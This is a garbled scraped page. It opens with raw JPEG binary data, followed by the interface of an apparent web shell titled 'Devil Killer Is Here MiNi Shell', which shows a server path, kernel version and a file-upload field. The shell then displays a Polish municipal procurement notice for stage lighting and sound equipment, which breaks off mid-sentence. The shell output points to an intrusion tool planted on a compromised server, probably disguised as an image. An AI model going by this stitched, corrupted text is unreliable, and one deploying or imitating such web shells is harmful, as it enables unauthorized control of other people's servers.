JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250730/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250730/0035375601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i montaż wyposażenia do Domu Ludowego im. Wincentego Witosa w Markowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MARKOWA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581809</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1399</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Markowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">172265352</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@markowa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.markowa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i montaż wyposażenia do Domu Ludowego im. Wincentego Witosa w Markowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-baa524ca-1cac-4d96-a308-00fdfdf36220</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00353756</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00062641/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup i montaż wyposażenia do Domu Ludowego im. Wincentego Witosa w Markowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugmarkowa.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ugmarkowa.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1Komunik. w prowadzonym post. o udzielenie zamówienia, w tym składanie ofert, wymiana inf. oraz przekazywanie dok. lub oświadczeń między zam. a wyk. odbywa się przy użyciu środków komunikacji elektr.<br/>2Przez środki komunikacji elektr. należy rozumieć środki komunikacji elektr. w rozumieniu ustawy z dnia 18 lipca 2002 roku o świadczeniu usług droga elektr.<br/>3Prowadzone postępowanie odbywa się za pośrednictwem elektr. platformy zakupowej GM, dostępnej pod adresem:https://ugmarkowa.ezamawiajacy.pl<br/>Składanie ofert możliwe jest tylko i wyłącznie za pośrednictwem ww platformy<br/>4Zainteresowany udziałem w postępowaniu musi posiadać aktywne konto na portalu oneplace.marketplanet.pl. Wyk. po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie poinformowany o możliwości zalogowania lub założenia bezpłatnego konta.<br/>5Rejestracja Wyk. trwa maksymalnie do 2 dni roboczych. W związku z tym Zam. zaleca Wyk. uwzględnienie czasu niezbędnego na rejestr. w procesie złożenia Oferty w postaci elektr.<br/>6W przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy w szczeg: z założeniem konta, zalog. się na konto, złożenia ofert, kom. z zam. za pośr. konta, Wyk. winien skontaktować się z dostawcą rozwiązania teleinf. Platforma Zakupowa Marketplanet +48 22 576 87 90, e-mail: oneplace@marketplanet.pl w godz.: 9:00 – 17:00.<br/>7. Używanie platformy w pełnym zakresie wymaga spełnienia min. wymagań sprzętowo – aplikacyjnych:<br/>a_Stały dostęp do sieci Internet o gwarant. przep. nie mniejszej niż 512 kb/s,<br/>b_Komputer PC lub MAC o nast. konfig: pamięć min. 2 GB RAM, procesor Intel IV 2 GHZ jeden z systemów operacyjnych:MS Windows, MAC Os x 10.4, Linux lub ich nowsze wersje<br/>c_Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer min. wersja 10.0<br/>d_Włączona obsługa JavaScript,<br/>e_Zainstalowany prog. Acrobat Reader lub inny obsługujący pliki pdf<br/>8Zamawiający określa pref. formaty podpisu elektronicznego, jako:<br/>dla dok. w formacie „pdf&#34; zaleca się format PAdES,<br/>dla dok. w innym formacie innym niż „pdf&#34;, zaleca się format XAdES [podpis zew. lub wew., preferowany zew.].<br/>przy podpisywaniu plików profilem zaufanym lub dowodem osobistym zaleca się wcześniejszy eksport plików do formatu „.pdf” i dopiero tak przygotowane pliki opatrywać podpisem elektronicznym.<br/>Zam. preferuje przygotowanie i podpisywanie wszystkich dokumentów formacie „.pdf”<br/>9Zam. określa dopuszczalne formaty przesyłanych danych:<br/>pliki o wielkości do 100 MB,formaty danych zgodne z przepisami wydanymi na podstawie art. 18 ustawy z dnia 17 lutego 2005 roku o informatyzacji dział. podmiotów realizujących zad. publiczne (Dz. U. z 2020 r. poz. 346, ze zm.) - txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, PAdES, ASIC, XMLenc,<br/>-zaleca się aby w prowadzonym postepowaniu posługiwać się plikami: txt, rtf, pdf, odt, doc, xls, docx, xlsx, jpg, jpeg, tif, tiff, zip, 7z, html, xml, przy czym preferowany format to – pdf<br/>Zam. określa informacje na temat kodowania i czasu odbioru danych:<br/>-plik załączony przez Wyk. na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zam. po upływie terminu otwarcia ofert.<br/>-oznaczenie czasu przekazani i odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu.<br/>10Strony postępowania (Zamawiający, Wykonawcy) mogą komunikować się również za pośrednictwem poczty elektronicznej, email: sekretariat@markowa.pl, magdalena.slezak@markowa.pl, michal.kluz@markowa.pl (nie dotyczy procesu składania ofert)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> administratorem Pani/Pana danych osobowych jest Gmina Markowa, 37-120 Markowa 1399, sekretariat@markowa.pl<br/> W sprawach związanych z danymi osobowymi można skontaktować się z wyznaczonym Inspektorem Ochrony Danych poprzez e-mail: iod@markowa.pl<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: Zakup i montaż wyposażenia do Domu Ludowego im. Wincentego Witosa w Markowej, nr IPP.271.13.2025;<br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu ustawę z dnia 11września 2019 r. – Prawo zamówień publicznych (t.j. Dz. U. 2023 poz. 1320), dalej „ustawa Prawo zamówień publicznych”;<br/> Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Prawo zamówień publicznych, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych;<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/> posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IPP.271.13.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja zadania pn.: „Zakup i montaż wyposażenia do Domu Ludowego im. Wincentego Witosa w Markowej”. Realizacja zadania będzie dofinansowana ze środków finansowych Ministra Kultury i Dziedzictwa Narodowego pochodzących z Funduszu Promocji Kultury. Zamawiający będzie realizował Zamówienie zgodnie z warunkami dofinansowania.<br/>2.	Przedmiotem zamówienia jest kompleksowy zakup, dostawa, montaż, uruchomienie i konfiguracja specjalistycznego wyposażenia technicznego dla sali widowiskowej Domu Ludowego w Markowej. Zakres zamówienia obejmuje nowoczesny system oświetlenia scenicznego, składający się z reflektorów profilowych, fresneli, par LED, kompaktowego sterownika DMX, splitera sygnałów oraz kompletnego systemu zasilania i tras kablowych. W ramach zadania przewidziano również montaż soczewek zmiennoogniskowych, uchwytów, linek zabezpieczających oraz przyłączy scenicznych.<br/>3.	Zamówienie obejmuje również system nagłośnieniowy, w tym zestawy głośnikowe liniowe, niskotonowe, frontfill i sidefill, wzmacniacze DSP, konsoletę miksującą z cyfrowym stageboxem, mikrofony przewodowe i bezprzewodowe oraz kompletny zestaw okablowania i statywów. Przewidziano zakup urządzeń dodatkowych, takich jak aktywne symetryzatory DI Box, splitter i combiner antenowy, anteny kierunkowe i dookólne, router i tablet do zdalnego sterowania systemem miksującym.<br/>4.	W zakres przedmiotu zamówienia wchodzi również montaż rozbudowanego systemu przyłączy sygnałowych i zasilających w wersjach ściennych i podłogowych, szafy serwerowej, paneli dystrybucji mocy oraz kompletu kabli instalacyjnych i transmisyjnych. Wszystkie urządzenia muszą być fabrycznie nowe, nieużywane, wolne od wad, posiadające wymagane certyfikaty i dopuszczenia do użytku.<br/>5.	Zamawiający wymaga, aby wszystkie elementy nagłośnienia były kompatybilne systemowo – pochodziły od jednego producenta. Wymaga się wykonania kompletnej instalacji, zawieszenia i osprzętu w technologii spełniającej wymogi bezpieczeństwa i jakości. Po zakończonym montażu wykonawca zobowiązany będzie do wstępnego zaprogramowania systemów oraz przeszkolenia wyznaczonego personelu z ich obsługi.<br/>6.	Całość instalacji ma być dostosowana do architektury obiektu, zapewniając wysoką jakość dźwięku, profesjonalne warunki oświetleniowe sceny oraz ergonomiczny i bezpieczny system mechaniki scenicznej. Przedmiot zamówienia ma zapewnić pełną funkcjonalność sali widowiskowej pod kątem organizacji wydarzeń kulturalnych, koncertów, spektakli i spotkań. Zakres prac obejmuje również wykonanie projektu montażowego adapterów i uchwytów konstrukcyjnych.<br/>7.	Wszystkie zastosowane rozwiązania muszą spełniać wymagania techniczne określone w szczegółowej specyfikacji, gwarantując pełną zgodność z zaplanowaną funkcjonalnością sali widowiskowej. Urządzenia muszą być objęte gwarancją producenta nie krótszą niż 24 miesiące. Elementy muszą być przystosowane do intensywnej eksploatacji w warunkach scenicznych, z zapewnieniem trwałości, niezawodności i odporności na uszkodzenia mechaniczne.<br/>8.	Wymaga się zastosowania materiałów o podwyższonej klasie szczelności, odporności na pył i wilgoć, w szczególności w przypadku urządzeń oświetleniowych oraz nagłośnieniowych przeznaczonych do pracy w różnych warunkach eksploatacyjnych. Wszystkie złącza, przewody i listwy muszą być wykonane w sposób umożliwiający łatwą konserwację oraz przyszłą rozbudowę systemu.<br/>9.	Częścią zamówienia jest także montaż mechaniki scenicznej, obejmującej wyciągi, uchwyty oraz niezbędną infrastrukturę nośną, umożliwiającą bezpieczne podwieszenie i eksploatację sprzętu scenicznego. Całość prac musi być wykonana zgodnie z obowiązującymi przepisami BHP oraz normami technicznymi dotyczącymi instalacji scenicznych.<br/>10.	Zamówienie obejmuje również przygotowanie dokumentacji powykonawczej oraz instrukcji obsługi z uwzględnieniem schematów podłączeń i topologii systemów. Wykonawca zobowiązany jest do wykonania pełnych prób funkcjonalnych i przekazania Zamawiającemu w pełni działającego systemu. Sprzęt powinien umożliwiać integrację z przyszłymi systemami audiowizualnymi.<br/>11.	Ostatecznie, zamówienie ma na celu stworzenie kompleksowej, nowoczesnej i funkcjonalnej infrastruktury technicznej sceny, która zapewni wysoki standard realizacji wydarzeń artystycznych i edukacyjnych w Domu Ludowym im. Wincentego Witosa w Markowej.<br/>12.	Zakres dostaw, wymagania ilościowe oraz jakościowe określa opis przedmiotu zamówienia stanowiący załącznik nr 10 do SWZ (Specyfikacja urządzeń nagłośnieniowych, oświetleniowych, mechaniki scenicznej oraz systemu multimedialnego dla potrzeb sali widowiskowej Domu Ludowego.)<br/>13.	Biorąc pod uwagę charakter zamówienia Zamawiający określa wymagania w zakresie dostępności dla osób niepełnosprawnych [art. 100 ust 1] poprzez zakup i dostawę w niniejszym zamówieniu pętli indukcyjnej do Sali widowiskowej Domu Ludowego, wobec czego Dom Ludowy im. Wincentego Witosa w Markowej spełniać będzie wymogi w zakresie dostępności dla osób niedosłyszących.<br/>14.	(Jeśli dotyczy – w każdym przypadku opisania przedmiotu zamówienia [w szczególności w załączniku nr 10 do SWZ – Szczegółowy Opis Przedmiotu Zamówienia] przez wskazanie nazw własnych, znaków towarowych, patentów lub pochodzenia, źródła, szczególnych procesów które charakteryzują produkty lub usługi) –<br/>a)	Podane w opisach nazwy własne, znaki towarowe, patenty lub pochodzenie, źródło, szczególne procesy, które charakteryzują produkty lub usługi nie mają na celu naruszenia art. 99 i art. 16 ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych Zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełniania następujących kryteriów w celu określenia równoważności: poziom jakościowy i merytoryczny – ten sam, gwarantujący taką samą funkcjonalność jak produkty opisane w przedmiocie zamówienia.<br/>b)	Zamawiający dopuszcza możliwość przedstawiania rozwiązań równoważnych w każdym przypadku opisania przedmiotu zamówienia przez wskazanie nazw własnych, znaków towarowych, patentów lub pochodzenia, źródła, szczególnych procesów, które charakteryzują produkty lub usługi. Przez rozwiązanie równoważne należy rozumieć propozycję, która zawiera opis przedmiotu zamówienia spełniający następujące kryteria:<br/>- parametry takie same lub lepsze od rozwiązań/ produktów, które zostały przedstawione w SOPZ ale są oznaczone innym znakiem towarowym, patentem lub pochodzeniem,<br/>- wskazana propozycja musi odpowiadać poziomowi jakości lub być lepsza pod względem jakości rozwiązań/ produktów wskazanych przez zamawiającego w opisie.<br/>c)	W przypadku zaoferowania rozwiązania/ produktu równoważnego, na wykonawcy spoczywa obowiązek udowodnienia zachowania cech określonych przez zamawiającego rozwiązań/ produktów. W przeprowadzonym dowodzie należy odnieść się do norm, parametrów oraz standardów i dokonać porównania z rozwiązaniami/ produktami wskazanym przez zamawiającego. Z porównania musi jednoznacznie wynikać, iż rozwiązanie/ produkt oferowany jako równoważny jest identyczny lub lepszy od rozwiązania/ produktu wskazanego przez zamawiającego. W tym celu wykonawca powinien precyzyjnie wyspecyfikować – w dokumentach załączonych do oferty – nazwę rozwiązania/ produktu, producenta oraz załączyć do oferty foldery, specyfikacje techniczne oferowanych rozwiązań/ produktów, aprobaty techniczne oraz inne dokumenty zawierające dane techniczne oferowanych rozwiązań/ produktów. Brak jakichkolwiek informacji o ofercie równoważnej oznaczać będzie, że wykonawca oferuje rozwiązania/ produkty według wymagań zamawiającego przedstawionych w załączniku nr 10 do SWZ – Szczegółowy Opis Przedmiotu Zamówienia.<br/>d)	W każdym przypadku w odniesieniu do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych Zamawiający dopuszcza rozwiązania równoważne.<br/><br/>Uwaga<br/>Zamawiający wymaga odbycia wizji lokalnej przez Wykonawców przed złożeniem oferty, gdyż z uwagi na specyficzne uwarunkowania realizacyjne, uważa ją za bardzo istotną dla należytego sporządzenia ofert.<br/>Brak udziału w wizji, spowoduje odrzucenie oferty na podstawie art. 226 ust. 1 pkt 18 ustawy Pzp.<br/><br/>Zamawiający przewiduje możliwość unieważnienia postępowania o udzielenie zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie całości, nie zostaną mu przyznane. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51310000-8 - Usługi instalowania urządzeń telewizyjnych, radiowych, dźwiękowych i wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32342410-9 - Sprzęt dźwiękowy</p> <p class="mb-0">32342300-5 - Mikrofony i zestawy głośnikowe</p> <p class="mb-0">32340000-8 - Mikrofony i głośniki</p> <p class="mb-0">31527200-8 - Oświetlenie zewnętrzne</p> <p class="mb-0">31527260-6 - Systemy oświetleniowe</p> <p class="mb-0">31518200-2 - Oświetlenie awaryjne</p> <p class="mb-0">39154000-6 - Sprzęt wystawowy</p> <p class="mb-0">39154100-7 - Szafki wystawowe</p> <p class="mb-0">32321200-1 - Urządzenia audiowizualne</p> <p class="mb-0">38652100-1 - Projektory</p> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45313000-4 - Instalowanie wind i ruchomych schodów</p> <p class="mb-0">32300000-6 - Odbiorniki telewizyjne i radiowe oraz aparatura nagrywająca dźwięk lub obraz lub aparatura powielająca</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena<br/><br/>Liczba punktów = (Cmin/Cof) * waga<br/>gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w badanej ofercie<br/><br/>Maksymalnie w danym kryterium można otrzymać 60 pkt.<br/><br/><br/>Okres gwarancji i rękojmi - G<br/><br/>Kryterium – „Okres gwarancji jakości i rękojmi” – G – poszczególnym ofertom zostaną przyznane punkty w oparciu o zadeklarowaną wartość oferowanego okresu gwarancji jakości i rękojmi za wady. Im dłuższy okres gwarancji jakości i rękojmi za wady tym większa liczba przyznanych punktów. Przy czym minimalny wymagany okres gwarancji jakości i rękojmi za wady wynosi 36 miesięcy. Przy zaoferowaniu 